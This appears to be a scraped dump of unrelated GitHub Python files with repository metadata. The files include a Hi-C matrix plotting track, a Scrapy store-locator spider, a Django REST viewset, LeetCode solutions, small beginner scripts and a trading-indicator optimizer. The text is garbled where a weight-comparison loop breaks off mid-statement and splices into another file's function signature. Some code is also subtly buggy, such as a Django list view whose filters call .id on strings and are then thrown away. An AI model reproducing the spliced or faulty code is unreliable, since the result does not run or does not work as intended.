coolbox.plots.track.base import TrackPlot\n\n\nlog = get_logger(__name__)\n\n\nSTYLE_TRIANGULAR = 'triangular'\nSTYLE_MATRIX = 'matrix'\nSTYLE_WINDOW = 'window'\n\nDEPTH_FULL = 'full'\n\n\nclass PlotHiCMatrix(TrackPlot):\n\n DEFAULT_COLOR = 'YlOrRd'\n\n def __init__(self, *args, **kwargs):\n TrackPlot.__init__(self, *args, **kwargs)\n\n self.__set_default_properties()\n\n self.small_value = 1e-12\n self.ax = None\n self.label_ax = None\n self.matrix = None\n self._out_of_bound = False\n\n from coolbox.utilities.hic.tools import file_type\n self.file_type = file_type(self.properties['file'])\n\n self.fetched_binsize = None\n\n def __set_default_properties(self):\n self.properties['height'] = 'hic_auto'\n\n if 'color' not in self.properties:\n self.properties['color'] = self.DEFAULT_COLOR\n if 'style' not in self.properties:\n self.properties['style'] = STYLE_TRIANGULAR\n if 'balance' not in self.properties:\n self.properties['balance'] = 'no'\n if 'color_bar' not in self.properties:\n self.properties['color_bar'] = 'yes'\n if 'transform' not in self.properties:\n self.properties['transform'] = 'no'\n if 'title' not in self.properties:\n self.properties['title'] = ''\n if 'depth_ratio' not in self.properties:\n self.properties['depth_ratio'] = DEPTH_FULL\n if 'norm' not in self.properties:\n self.properties['norm'] = 'log'\n\n @property\n def is_inverted(self):\n if 'orientation' in self.properties and self.properties['orientation'] == 'inverted':\n return True\n else:\n # default: not inverted\n return False\n\n @property\n def style(self):\n if 'style' in self.properties:\n return self.properties['style']\n else:\n # default triangular style\n return STYLE_TRIANGULAR\n\n @property\n def balance(self):\n if self.properties['balance'] == 'no':\n return False\n else:\n if self.file_type == '.hic':\n if self.properties['balance'] == 'yes':\n return 'KR' # default use KR balance\n else:\n return self.properties['balance']\n else:\n return True\n\n @property\n def 
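The greedy in the snippet above pairs each person with the leftmost unused hamburger within distance K; restated compactly below with the more common convention 'P' = person, 'H' = hamburger (the record flips the letters), on a made-up input:

def distribute(s: str, k: int) -> int:
    taken = [False] * len(s)
    fed = 0
    for i, ch in enumerate(s):
        if ch != 'P':
            continue
        # Take the leftmost free hamburger within the window [i-k, i+k].
        for j in range(max(i - k, 0), min(i + k + 1, len(s))):
            if s[j] == 'H' and not taken[j]:
                taken[j] = True
                fed += 1
                break
    return fed

assert distribute("PHHP", 1) == 2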
is_balance(self):\n return bool(self.balance)\n\n def __transform_matrix(self, arr):\n if self.properties['transform'] == 'log10':\n arr = np.log10(arr)\n elif self.properties['transform'] == 'log2':\n arr = np.log2(arr)\n elif self.properties['transform'] == 'log':\n arr = np.log(arr)\n return arr\n\n @property\n def matrix_val_range(self):\n small = 1e-4\n arr = self.matrix\n arr_no_nan = arr[np.logical_not(np.isnan(arr))]\n\n if self.properties['min_value'] == 'auto':\n # set minimal value for color bar\n min_ = arr[arr > arr.min()].min()\n else:\n min_ = self.properties['min_value']\n\n if self.properties['max_value'] == 'auto':\n max_ = arr_no_nan.max()\n else:\n max_ = self.properties['max_value']\n\n if max_ <= min_:\n max_ = min_ + small\n\n return min_, max_\n\n def __fetch_matrix(self, genome_range, resolution='auto'):\n \"\"\"\n Fetch the matrix.\n\n Parameters\n ----------\n genome_range : coolbox.utilities.GenomeRange\n The genome range to fetch.\n\n resolution : {'auto', int}\n The matrix resolution, for multi-resolution(.hic or multi-cool) file.\n Use 'auto' to infer the resolution automatically.\n default 'auto'\n \"\"\"\n from coolbox.utilities.hic.wrap import StrawWrap, CoolerWrap\n\n path = self.properties['file']\n if self.file_type == '.hic':\n wrap = StrawWrap(path, normalization=self.balance, binsize=resolution)\n else:\n wrap = CoolerWrap(path, balance=self.balance, binsize=resolution)\n\n arr = wrap.fetch(genome_range)\n\n self.fetched_binsize = wrap.fetched_binsize # expose fetched binsize\n\n # fill zero and nan with small value\n small = self.small_value\n arr[arr == 0] = small\n arr[np.isnan(arr)] = small\n\n if 'transform' in self.properties and self.properties['transform'] != 'no':\n arr = self.__transform_matrix(arr)\n\n return arr\n\n def __get_triangular_matrix(self, arr):\n small = self.small_value\n tri_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n\n rows = tri_matrix.shape[0]\n\n tri_matrix = tri_matrix[0:(rows//2 + 1), :]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(tri_matrix.shape[0] * depth_ratio)\n tri_matrix = tri_matrix[-depth:, :]\n\n return tri_matrix\n\n def __get_window_matrix(self, arr):\n small = self.small_value\n window_matrix = ndimage.rotate(arr, 45, prefilter=False, cval=small)\n rows, cols = window_matrix.shape\n if self._out_of_bound == 'left':\n # left side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'right':\n # right side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :(2*x+1)]\n elif self._out_of_bound == 'both':\n # double side out of bound\n x = cols // 3\n window_matrix = window_matrix[(rows//6):((rows//2) + 1), :]\n else:\n # normal\n x = cols // 4\n window_matrix = window_matrix[(rows//4):(rows//2 + 1), x:(3*x + 1)]\n\n # cut depth\n if self.properties['depth_ratio'] != 'auto' and self.properties['depth_ratio'] != DEPTH_FULL:\n depth_ratio = float(self.properties['depth_ratio'])\n depth = int(window_matrix.shape[0] * depth_ratio)\n window_matrix = window_matrix[-depth:, :]\n\n return window_matrix\n\n def __plot_matrix(self, genome_range):\n start, end = genome_range.start, genome_range.end\n ax = self.ax\n arr = self.matrix\n cmap = plt.get_cmap(self.properties['color'])\n cmap.set_bad(\"white\")\n cmap.set_under(\"white\")\n c_min, c_max = 
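A toy run of the transform and colour-range logic above (numpy only, values invented; `np.nanmin` stands in here to sidestep the NaN entries the real matrix may contain):

import numpy as np

arr = np.log10(np.array([[1.0, 10.0], [100.0, np.nan]]))
finite = arr[np.logical_not(np.isnan(arr))]
vmin = arr[arr > np.nanmin(arr)].min()  # smallest value strictly above the minimum
vmax = finite.max()
assert (vmin, vmax) == (1.0, 2.0)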
self.matrix_val_range\n\n depth_ratio = 1.0 if self.properties['depth_ratio'] == DEPTH_FULL else self.properties['depth_ratio']\n\n if self.style == STYLE_TRIANGULAR:\n # triangular style\n tri_matrix = self.__get_triangular_matrix(arr)\n img = ax.matshow(tri_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n elif self.style == STYLE_WINDOW:\n # window style\n window_matrix = self.__get_window_matrix(arr)\n img = ax.matshow(window_matrix, cmap=cmap,\n extent=(start, end, 0, depth_ratio * (end - start)/2),\n aspect='auto')\n else:\n # matrix style\n img = ax.matshow(arr, cmap=cmap,\n extent=(start, end, end, start),\n aspect='auto')\n\n if self.properties['norm'] == 'log':\n img.set_norm(colors.LogNorm(vmin=c_min, vmax=c_max))\n else:\n img.set_norm(colors.Normalize(vmin=c_min, vmax=c_max))\n\n return img\n\n def __adjust_figure(self, genome_range):\n ax = self.ax\n start, end = genome_range.start, genome_range.end\n if self.style == STYLE_TRIANGULAR or self.style == STYLE_WINDOW:\n\n if self.properties['depth_ratio'] == DEPTH_FULL:\n depth = genome_range.length / 2\n else:\n depth = (genome_range.length / 2) * self.properties['depth_ratio']\n\n if self.is_inverted:\n ax.set_ylim(depth, 0)\n else:\n ax.set_ylim(0, depth)\n else:\n ax.set_ylim(end, start)\n ax.set_xlim(start, end)\n\n def __plot_colorbar(self, img, orientation='vertical'):\n if orientation == 'horizontal':\n ax_divider = make_axes_locatable(self.ax)\n if self.is_inverted:\n cax = ax_divider.append_axes(\"top\", size=0.09, pad=0.2)\n else:\n cax = ax_divider.append_axes(\"bottom\", size=0.09, pad=0.2)\n colorbar(img, cax=cax, orientation='horizontal')\n else: # vertical\n y_ax = self.y_ax\n\n if self.properties['norm'] == 'log':\n from matplotlib.ticker import LogFormatter\n formatter = LogFormatter(10, labelOnlyBase=False)\n aa = np.array([1, 2, 5])\n c_min, c_max = self.matrix_val_range\n\n def abs_inc(num):\n if num != 0:\n sign = num / abs(num)\n return int(sign * abs(num + 1))\n else:\n return 1\n\n lower_ = int(np.log10(c_min))\n upper_ = abs_inc(int(np.log10(c_max)))\n tick_values = np.concatenate([aa * 10 ** x for x in range(lower_, upper_)])\n\n c_bar = plt.colorbar(img, ax=y_ax, ticks=tick_values, format=formatter, fraction=0.98)\n else:\n c_bar = plt.colorbar(img, ax=y_ax, fraction=0.98)\n\n c_bar.solids.set_edgecolor(\"face\")\n c_bar.ax.tick_params(labelsize='smaller')\n\n c_bar.ax.yaxis.set_ticks_position('left')\n\n def __fetch_window_matrix(self, genome_range):\n from copy import copy\n fetch_range = copy(genome_range)\n x = (genome_range.end - genome_range.start) // 2\n fetch_range.start = genome_range.start - x\n fetch_range.end = genome_range.end + x\n\n if fetch_range.start < 0:\n fetch_range.start = genome_range.start\n self._out_of_bound = 'left'\n\n try:\n arr = self.__fetch_matrix(fetch_range)\n except ValueError as e:\n if self._out_of_bound == 'left':\n self._out_of_bound = 'both'\n arr = self.__fetch_matrix(genome_range)\n else:\n self._out_of_bound = 'right'\n fetch_range.end = genome_range.end\n arr = self.__fetch_matrix(fetch_range)\n return arr, fetch_range\n\n def plot(self, ax, chrom_region, start_region, end_region):\n self.ax = ax\n\n self._out_of_bound = False\n\n log.debug(\"plotting {}\".format(self.properties['file']))\n\n genome_range = GenomeRange(chrom_region, start_region, end_region)\n\n self.ax = ax\n\n # fetch matrix and perform transform process\n if self.style == STYLE_WINDOW:\n arr, fetch_region = 
self.__fetch_window_matrix(genome_range)\n self.fetch_region = fetch_region\n else:\n arr = self.__fetch_matrix(genome_range)\n\n self.matrix = arr\n\n # plot matrix\n img = self.__plot_matrix(genome_range)\n self.__adjust_figure(genome_range)\n\n # plot colorbar\n if self.properties['color_bar'] == 'yes':\n if hasattr(self, 'y_ax') and self.style == STYLE_WINDOW:\n self.__plot_colorbar(img, orientation='vertical')\n else:\n self.__plot_colorbar(img, orientation='horizontal')\n else:\n pass\n\n # plot label\n self.plot_label()\n\n def get_track_height(self, frame_width):\n \"\"\"\n calculate track height dynamically.\n \"\"\"\n if self.style == STYLE_TRIANGULAR:\n height = frame_width * 0.5\n elif self.style == STYLE_WINDOW:\n if 'height' in self.properties and self.properties['height'] != 'hic_auto':\n height = self.properties['height']\n else:\n height = frame_width * 0.3\n else:\n height = frame_width * 0.8\n\n if 'depth_ratio' in self.properties and self.properties['depth_ratio'] != DEPTH_FULL:\n if self.properties['style'] != STYLE_MATRIX:\n height = height * self.properties['depth_ratio']\n\n if 'color_bar' in self.properties and self.properties['color_bar'] != 'no':\n height += 1.5\n\n return height\n","repo_name":"raivivek/CoolBox","sub_path":"coolbox/plots/track/hicmatrix.py","file_name":"hicmatrix.py","file_ext":"py","file_size_in_byte":12979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"12147505517","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n# O(min(n, m)) Time | O(1) Space\ndef merge_lists(head_1, head_2):\n new_head = Node(None)\n tail = new_head\n current_1 = head_1\n current_2 = head_2\n \n while current_1 is not None and current_2 is not None:\n if current_1.val < current_2.val:\n tail.next = current_1\n current_1 = current_1.next\n else:\n tail.next = current_2\n current_2 = current_2.next\n tail = tail.next\n if current_1 is not None: tail.next = current_1\n if current_2 is not None: tail.next = current_2\n \n return new_head.next","repo_name":"JeffersonGarcia15/Data-Structures-Algorithms","sub_path":"data_structures/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"33078129205","text":"import pyfirmata\nfrom pyfirmata import Arduino, util\nimport time\nimport math\n\nboard = Arduino('COM3')\n\n#pin = board.get_pin('a:0:i') #analog pin 0 input\n\ncontrol = board.analog[1]\n\niterator = util.Iterator(board)\niterator.start()\ntime.sleep(0.1)\n\ntry:\n while True:\n control.enable_reporting()\n val = control.read()\n\n if(val == None):\n continue\n\n val = val*10\n\n if(val == 0):\n val = 1\n\n val = math.ceil(val)\n \n print(str(val))\n\n time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n board.exit()\n","repo_name":"rdaw6/Dancing-Lights--Sr-Design","sub_path":"Indv Controls Tests/potentiometer_test.py","file_name":"potentiometer_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"8229248895","text":"import unittest\nimport requests\nimport json\nimport sys\nsys.path.append(\"../..\") # go up two levels to the project root\n\nfrom lib.read_excel import * # imported from under the project path\nfrom lib.case_log import log_case_info # imported from under the project path\n\n\nclass BaseCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = 
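Quick usage check for `merge_lists` above, with two throwaway helpers (my additions) to build and flatten linked lists; it assumes the `Node` class from the same snippet is in scope:

def from_values(vals):
    head = tail = Node(vals[0])
    for v in vals[1:]:
        tail.next = Node(v)
        tail = tail.next
    return head

def to_values(head):
    out = []
    while head is not None:
        out.append(head.val)
        head = head.next
    return out

assert to_values(merge_lists(from_values([1, 3, 5]), from_values([2, 4]))) == [1, 2, 3, 4, 5]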
excel_to_list(data_file, cls.__name__)\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = case_data.get('case_name')\n url = case_data.get('url')\n args = case_data.get('args')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper() == 'FORM':\n res = requests.post(url=url, data=json.loads(args))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n else:\n res = requests.post(url=url, json=json.loads(args))\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n print(issubclass(BaseCase,BaseCase))","repo_name":"hanzhichao/api_test_framework","sub_path":"test/case/basecase.py","file_name":"basecase.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"42392983260","text":"import re\n\nfrom scrapy import FormRequest\nfrom scrapy.http import Response\n\nfrom StoreScraper.items import StoreItem\nfrom StoreScraper.spiders import base_spider\n\n\nclass PanasonicSpider(base_spider.BaseSpider):\n name = \"panasonicproclub.com\"\n\n def start_requests(self):\n post_data = {\n 'geo': '0',\n 'lat': '51.165691',\n 'lng': '10.451526',\n 'address': 'Deutschland',\n 'selected_list': '36',\n 'distance': '500',\n 'search': ''\n }\n yield FormRequest(url='https://www.panasonicproclub.com/ifinder/DE_de/home/', formdata=post_data)\n\n def parse(self, response: Response, **kwargs):\n values = re.findall(r'marcadores\\[(\\d+)]\\[(\\d+)]\\s*=\\s*\"(.*?)\";', response.text)\n results = dict()\n for row_index, column_index, value in values:\n if row_index not in results:\n results[row_index] = {\n 'Source': self.name\n }\n if column_index == '0':\n results[row_index]['Name1'] = value\n if column_index == '1':\n results[row_index]['Address'] = value\n if column_index == '99':\n results[row_index]['Zip'] = value\n if column_index == '100':\n results[row_index]['City'] = value\n if column_index == '3':\n results[row_index]['Phone'] = value\n if column_index == '4':\n results[row_index]['Email'] = value\n if column_index == '5':\n results[row_index]['Website'] = value\n if column_index == '6':\n results[row_index]['Latitude'] = value\n if column_index == '7':\n results[row_index]['Longitude'] = value\n for key, value in results.items():\n parsed_result = StoreItem(**value)\n yield self.add_unique_address_id(parsed_result)\n","repo_name":"ptsonev/StoreScraper","sub_path":"StoreScraper/spiders/panasonic_spider.py","file_name":"panasonic_spider.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1034970260","text":"peso = 0\n\nmaior = 0\n\nmenor = 500\n\nfor c in range (1,6):\n\n peso = float(input('What is the weight of person {}? (kg)'.format(c)))\n\n if peso>maior:\n\n maior = peso\n\n elif peso int:\n i = 0\n tempArea = 0\n arLength = len(height)\n for i in range(arLength):\n for j in range(i+1,arLength):\n if height[i] > height[j]:\n area = height[j] * (j-i)\n else:\n area = height[i] * (j-i)\n if area > tempArea:\n tempArea = area\n print(\"area:\"+str(area))\n print(\"temparea:\"+str(tempArea))\n \n return tempArea\n\n #viewed solution\n def maxArea(self,height: list[int]) -> int:\n left = 0\n right = len(height)-1\n area = 0\n while right > left:\n tarea = min(height[left], height[right]) * (right - left)\n\n if tarea > area:\n area = tarea\n \n if height[left] < height[right]:\n left = left + 1\n elif height[left] > height[right]:\n right = right - 1\n else:\n left = left + 1\n right = right - 1\n return area\n\nS1 = Solution()\nheight = [1,8,6,2,5,4,8,3,7]\nprint(S1.maxArea(height))\n\n\n\n","repo_name":"ocnow/CodeProblems","sub_path":"LeetCode/container-with-most-water.py","file_name":"container-with-most-water.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36205162908","text":"'''\nProblem Description: \nFind the pair of two elements inside an array that sums to the target.\n\nInput : array = [1,2,31,55,3,4,5,6,19] / target = 50\nOutput : [31,19]\n'''\n\nimport time\n\n\n## Method 1: Brute Force Approach\ndef pairSumV1(nums,target):\n res = []\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n if nums[i] + nums[j] == target:\n res.append([nums[i],nums[j]])\n return res\n\n\n## Method 2: Sorted Only, Implemented using general Double Pointer Approach\ndef pairSumV2(nums, target):\n res = []\n start, end = 0, len(nums)-1\n while(start < end):\n _sum = nums[start] + nums[end]\n if(_sum == target):\n res.append([nums[start], nums[end]])\n start += 1\n end -= 1\n elif(_sum > target):\n end -= 1\n elif(_sum < target):\n start += 1\n return res if res else []\n\n\n## Method 3: Pair Sum, Implemented on unsorted Array using a hash map;\ndef pairSumV3(nums, target):\n temp = {}\n res = []\n for (key,value) in enumerate(nums): # enumerate(nums) => key:value;\n needed = target-value\n if needed in temp:\n res.append([needed, value])\n else:\n temp[value]=key\n return res\n\ndef main():\n try:\n # res = pairSumV1(nums=[9,8,21,46,23,45,1,2,3,4,5], target=50) # Unsorted\n res1 = pairSumV2(nums=[1, 2, 3, 4, 5, 8, 9, 21, 23, 45, 46], target=50) # Sorted\n res2 = pairSumV3(nums=[9, 8, 21, 46, 23, 45, 1, 2, 3, 4, 5], target=50) # Unsorted\n print(res1) if res1 else print(\"Empty!\")\n print(res2) if res2 else print(\"Empty!\")\n \n except(Exception) as e:\n print(f\"Exception Traced : {e}\")\n \n else:\n print(\"Program Completed : Success\")\n\n finally:\n print(\"Program Terminated!\")\n\n \nif __name__ == '__main__':\n print(\"#------------ Code Start --------------#\")\n startTime = time.time()\n main()\n endTime = time.time()\n print(\"Run Time:\",endTime-startTime,\"ms\")\n print(\"#------------ Code Stop ----------------#\")\n ","repo_name":"neerajsinghjr/dsa","sub_path":"coding-minutes/01.Array/P001_Sort_array_Pair_Sum.py","file_name":"P001_Sort_array_Pair_Sum.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12238736870","text":"import numpy as np\n\n# this script will solve a system of linear equations\n# to determine the optimal angular offsets to align Pmx\n\n#dPmx = E'*cos(theta_e)*dtheta_e - 
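The store-finder spider earlier relies on a single `re.findall` over inline JavaScript; here it is exercised on a two-assignment sample string (the sample is invented, the pattern is the spider's):

import re

sample = 'marcadores[0][0] = "Store A"; marcadores[0][1] = "Main St 1";'
triples = re.findall(r'marcadores\[(\d+)]\[(\d+)]\s*=\s*"(.*?)";', sample)
assert triples == [('0', '0', 'Store A'), ('0', '1', 'Main St 1')]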
pf*cos(theta_p)dtheta_p\n#dPmz = E'*sin(theta_e)*dtheta_e + pf*sin(theta_p)dtheta_p\n\n\na_00 = 3. # Ef * np.cos(theta_e)\na_01 = 2 #-pf * np.cos(theta_p)\na_10 = 0 # Ef * np.sin(theta_e)\na_11 = 6 # pf * np.sin(theta_p)\n\n\nA = np.array([[a_00, a_01], \n [a_10, a_11]])\n\nA_inv = np.linalg.inv(A)\n\n#dth = [ dtheta_e, dtheta_p ]\n#dPm = [ dPmx, dPmz ]\n\ndPm = np.array([1.0, 1.0]) # placeholder [dPmx, dPmz] values; the original referenced an undefined x here\nresult = A_inv.dot(dPm)\nprint('result=',result)\n\n","repo_name":"Yero1990/cafe_offline_replay","sub_path":"post_analysis/special_studies/heep_check/calculate_offsets.py","file_name":"calculate_offsets.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14169788407","text":"import random\nsecret =random.randint(1,10)\ntimes = 3\nguess = 0\nprint(\"Come on, guess the number I am thinking of right now.\", end=\"\")\nwhile (guess != secret) and (times > 0):\n temp = input('Enter your guess here')\n guess = int(temp)\n times = times - 1\n if guess == secret:\n print('Congratulations, you got it!')\n print('Hmph, no prize for getting it right though')\n else:\n if guess > secret:\n print('Too big')\n else:\n print('Too small')\n if times > 0:\n print('Try again,')\n else:\n print('Sorry, you are out of chances')\nprint(\"Game over, thanks for playing!\")\n","repo_name":"unclelaozhang/Python_fishc","sub_path":"改进小游戏独立完成.py","file_name":"改进小游戏独立完成.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72450674669","text":"notas = input()\nnota1 = ''\nvar = True\n\nwhile var:\n for v in notas:\n if v.isdigit() or v == '.':\n nota1 += v\n else:\n var = False\n break\n\nnota2 = ''.join(x for x in notas if x not in nota1)\n\nif nota2 == ' ':\n nota2 += notas[0]\n nota2 += notas[1]\n\nmedia = (float(nota1) + float(nota2)) / 2\n\nif media >= 7:\n print('Approved')\n\nelif media >= 4:\n print('Make-up exam')\n\nelse:\n print('Failed')","repo_name":"gabrielbelo2007/Activities","sub_path":"Activities (NEPS)/Aprovado ou Reprovado.py","file_name":"Aprovado ou Reprovado.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44348204317","text":"import tkinter as tk\r\nfrom tkinter import simpledialog\r\n\r\ndef main():\r\n root = tk.Tk()\r\n root.withdraw()\r\n value = simpledialog.askstring(\"Input\", \"Enter a value:\")\r\n if value is not None:\r\n print(\"Value entered:\", value)\r\n else:\r\n print(\"No value entered.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"CaDelTo/Cado-Project","sub_path":"ConsolaTryOut.py","file_name":"ConsolaTryOut.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26917068943","text":"# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework import generics\nfrom hangrymealsapi.models import RecipeIngredients, Recipe, Ingredient\n\n\n\nclass RecipeIngredientsSerializer(serializers.ModelSerializer):\n class Meta:\n model = RecipeIngredients\n fields = ('id', 'recipe', 'ingredient')\n depth = 2\n\n\nclass RecipeIngredientsView(ViewSet):\n\n def 
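For the 2x2 offset system above, `np.linalg.solve` is the usual alternative to forming the inverse explicitly; the right-hand side below is a placeholder, as in the repaired script:

import numpy as np

A = np.array([[3., 2.], [0., 6.]])
dPm = np.array([1.0, 0.6])        # placeholder [dPmx, dPmz] measurements
dth = np.linalg.solve(A, dPm)     # [dtheta_e, dtheta_p]
assert np.allclose(A @ dth, dPm)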
retrieve(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def list(self, request):\n recipeingredients = RecipeIngredients.objects.all()\n recipe = request.query_params.get('recipe', None)\n if recipe is not None:\n recipe = recipeingredients.filter(recipe=recipe.id)\n ingredient = request.query_params.get('ingredient', None)\n if ingredient is not None:\n ingredient = recipeingredients.filter(ingredient=ingredient.id)\n serializer = RecipeIngredientsSerializer(recipeingredients, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients = RecipeIngredients.objects.create(\n recipe=recipe,\n ingredient=ingredient,\n )\n serializer = RecipeIngredientsSerializer(recipeingredients)\n return Response(serializer.data)\n\n def update(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipe = Recipe.objects.get(pk=request.data[\"recipe\"])\n ingredient = Ingredient.objects.get(pk=request.data[\"ingredient\"])\n recipeingredients.recipe = recipe\n recipeingredients.ingredient = ingredient\n recipeingredients.save()\n\n return Response(None, status=status.HTTP_204_NO_CONTENT)\n\n def destroy(self, request, pk):\n recipeingredients = RecipeIngredients.objects.get(pk=pk)\n recipeingredients.delete()\n return Response(None, status=status.HTTP_204_NO_CONTENT)\nclass ByRecipeIngredientsView(generics.ListCreateAPIView):\n serializer_class = RecipeIngredientsSerializer\n\n def get_queryset(self):\n recipe_id = self.kwargs['recipe_id']\n return RecipeIngredients.objects.filter(recipe__id=recipe_id)\n","repo_name":"shalane-proctor/hangry-meals-server","sub_path":"hangrymealsapi/views/recipeingredients.py","file_name":"recipeingredients.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41259498056","text":"class Solution:\n def plusOne(self, digits: 'List[int]') -> 'List[int]':\n i = len(digits)-1\n cnt = 1\n while i >= 0:\n if digits[i]+cnt >= 10:\n digits[i], cnt = 0, 1\n i -= 1\n else:\n digits[i] += cnt\n return digits\n if cnt != 0:\n return [1]+digits\n else:\n return digits\n\n\nif __name__ == \"__main__\":\n print(\n Solution().plusOne(\n [0]\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0066/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"28531364937","text":"'''\nThis file uses the class `TechnicalIndicatorOptimizer`\nthat I created to optimize the technical indicators\nand build a dashboard to compare the results of the different indicators\nThis is a very slow process and will take a long time to run.\nI'm sure there is a LOT of room for improvement here.\n'''\n\nfrom ta_optimizer import TechnicalIndicatorOptimizer\nimport logging\nimport os\nimport pandas_ta as ta\nimport pandas as pd\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Load data into a Pandas DataFrame\ndf = pd.read_csv('data/btc.csv', parse_dates=True, index_col=0)\nmodel_store = 'models/'\nos.makedirs(model_store, exist_ok=True) # create the models directory if it doesn't exist\n\n\n# 
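The carry loop in `plusOne` above can also be checked against a base-10 round trip (a test oracle of mine, valid for non-empty base-10 digit lists):

def plus_one_oracle(digits):
    # Join digits into an integer, add one, split back into digits.
    n = int("".join(map(str, digits))) + 1
    return [int(c) for c in str(n)]

assert plus_one_oracle([9, 9]) == [1, 0, 0]
assert plus_one_oracle([1, 2, 3]) == [1, 2, 4]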
SMA\nlogging.info(\"Optimizing SMA\")\nsma_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.sma, \n \"sma\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nsma_best_result = sma_optimizer.optimize()\nprint(\"SMA Best Result:\", sma_best_result)\n\n# EMA\nlogging.info(\"Optimizing EMA\")\nema_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.ema, \n \"ema\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nema_best_result = ema_optimizer.optimize()\nprint(\"EMA Best Result:\", ema_best_result)\n\n# Stochastic\nlogging.info(\"Optimizing Stochastic\")\nstoch_optimizer = TechnicalIndicatorOptimizer(\n df,\n None,\n \"stoch\",\n [\"k_period\", \"d_period\"],\n [(5, 3), (14, 3), (14, 5)],\n [5, 30, 60, 90, 120],\n indicator_type='stochastic'\n)\nstoch_best_result = stoch_optimizer.optimize()\nprint(\"Stochastic Best Result:\", stoch_best_result)\n\n# Plot the analysis results for the two different moving average indicators\nsma_results = [sma_optimizer.evaluate_indicator_param(param_value) for param_value in sma_optimizer.param_values]\nema_results = [ema_optimizer.evaluate_indicator_param(param_value) for param_value in ema_optimizer.param_values]\n# Generate the analysis results for the different Stochastic parameter values\nstoch_results = [stoch_optimizer.evaluate_indicator_param(param_value) for param_value in stoch_optimizer.param_values]\n\n\nlogging.info(\"Plotting SMA Analysis Dashboard\")\nsma_optimizer.plot_analysis_dashboard(\n sma_results, title='SMA Optimization Dashboard')\nlogging.info(\"Plotting EMA Analysis Dashboard\")\nema_optimizer.plot_analysis_dashboard(\n ema_results, title='EMA Optimization Dashboard')\nlogging.info(\"Plotting Stochastic Analysis Dashboard\")\nstoch_optimizer.plot_analysis_dashboard(\n stoch_results, title='Stochastic Optimization 